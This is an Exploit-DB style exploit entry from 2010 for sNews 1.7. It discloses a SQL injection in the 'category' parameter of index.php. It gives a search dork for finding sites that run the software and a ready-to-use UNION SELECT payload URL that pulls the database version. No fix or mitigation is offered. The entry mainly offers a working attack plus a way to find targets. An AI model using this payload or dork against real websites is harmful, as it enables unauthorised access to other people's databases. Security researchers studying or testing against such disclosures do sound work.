sNews 1.7 - 'index.php?category' SQL Injection

EDB-ID:

14465


Author:

CoBRa_21

Type:

webapps


Platform:

PHP

Date:

2010-07-24


########################################################################################

sNews v1.7 (index.php?category) SQL Injection Vulnerability

########################################################################################

Author : CoBRa_21

Author Web Page : http://www.ipbul.org

Dork: "Powered by sNews"

########################################################################################
 
Sql Injection:

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8

########################################################################################
Thanks http://e-banka.org & http://www.cyber-warrior.org
########################################################################################